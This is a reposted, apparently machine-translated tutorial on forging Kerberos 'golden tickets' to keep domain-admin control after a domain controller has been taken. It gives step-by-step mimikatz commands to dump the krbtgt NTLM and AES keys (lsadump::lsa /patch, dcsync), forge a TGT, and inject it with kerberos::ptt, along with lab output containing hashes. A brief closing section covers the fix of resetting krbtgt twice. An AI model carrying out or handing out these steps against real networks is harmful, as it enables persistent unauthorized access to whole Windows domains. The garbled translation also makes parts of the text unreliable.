Shulou(Shulou.com)06/02 Report--

Preface of 0x00

When the domain * * is successful and the domain controller has been captured, the * user usually needs to maintain the permissions in the domain and permanently control the domain controller. The golden ticket mentioned in this article mainly uses the defects of Microsoft Kerberos protocol and the information of krbtgt account in the domain to generate arbitrary TGT, which can be used for any service authenticated by Kerberos in the current domain. * users only need to save the information in their krbtgt account and inject golden ticket into memory to have permission, and the ticket is valid for 10 years.

0x01 prepares to work on a domain controller and administrator privileges (dc is not captured, what's the follow-up? ) mimikatz0x02 simulation environment

Domain Controller 2008r2 dc.test.com 192.168.3.100

Domain machine 2008r2 client.test.com 192.168.3.10

Extraterritorial machine win7 xxxxxx.xxx 192.168.3.18

0x03 vulnerability self-test

I can only go to the diary.

0x04 exploit 1. Get krbtgt account information

Includes Server SID, NTLM, or aes256 or aes128, using mimikatz operations on domain controllers

C:\ Users\ Administrator\ Desktop > mimikatz.exe "privilege::debug", "lsadump::lsa / patch"exit" mimikatz (commandline) # privilege::debugPrivilege '20' OKmimikatz (commandline) # lsadump::lsa / patchDomain: TEST / Smur1-5-21-1406004368-3818689962-3591297438RID: 000001f6 User: krbtgtLM: NTLM: 80c073620041d7cc60c36ea12bdecb5d// shows only the key parts

To grab aes256, you need to use another command. Aes256 and NTLM only need one.

C:\ Users\ Administrator\ Desktop > mimikatz.exe "privilege::debug"lsadump::dcsync / domain:test.com / user:krbtgt"exit" mimikatz (commandline) # privilege::debugPrivilege '20' OKmimikatz (commandline) # lsadump::dcsync / domain:test.com / user:krbtgt [DC]' test.com' will be the domain [DC] 'dc.test.com' will be the DC server [DC]' krbtgt' will be the user accountSupplemental Credentials:* Primary:Kerberos-Newer- Keys * Default Salt: TEST.COMkrbtgt Default Iterations: 4096 Credentials aes256_hmac (4096): 7a615ae0d4b62a304ab086749b87ec0933dccb62c15e9fc2ca176bd4cf5ee8c5 aes128_hmac (4096): aeb64a10f1fa77b344fb873ba04fa755 des_cbc_md5 (4096): dcd9ec620b26f7df rc4_plain (4096): 80c073620041d7cc60c36ea12bdecb5d2. Generate golden ticket (which is actually a TGT ticket)

First use NTLM to generate the ticket

C:\ Users\ Administrator\ Desktop > mimikatz.exe "kerberos::golden / user:Administrator / domain: domain name / sid:SERVER SID / krbtgt:NTLM / ticket:test.kirbi"exit"

After execution, a ticket is generated in the current directory, named test.kirbi

Aes256 generates a ticket

C:\ Users\ Administrator\ Desktop > mimikatz.exe "kerberos::golden / user:Administrator / domain: domain name / sid:SERVER SID / aes256: value / ticket:xxx.kirbi"exit"

After execution, a ticket is generated in the current directory, named xxx.kirbi

Aes128 is the same as 256. just change the parameter name and value / aes128:xxx

3. Bill injection

Two machines are used for testing, one is an in-domain member machine and the other is an out-of-domain member machine to test whether any machine that can connect to the domain can get domain management rights through tickets. Save the ticket to two machines

* in-domain machine testing

! Machines in the domain cannot directly access the domain controller until the ticket is injected

Mimikatz # kerberos::ptt aes256.kirbi # xxx.kirbi is the file name

! Successfully access the domain controller after injecting the ticket

* extraterritorial machine testing

It should be noted that the out-of-domain machine must first point the dns to the domain controller or the intra-domain dns server, otherwise the hostname cannot be resolved

Can be parsed normally!

Machine is not in the domain

! Out-of-domain machines cannot directly access the domain controller until the ticket is injected

! After the ticket is injected, the extraterritorial machine successfully accesses the domain controller

When accessing 0x05 details, you cannot use an ip address, you must use a domain name

If there are any mistakes, please correct the axe, thank you! 0x06 repair

When the domain is *, not only the domain administrator password but also the krbtgt account password need to be reset, and it needs to be reset twice in order to invalidate the golden ticket, otherwise the person with golden ticket will be able to enter and exit the domain at will

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.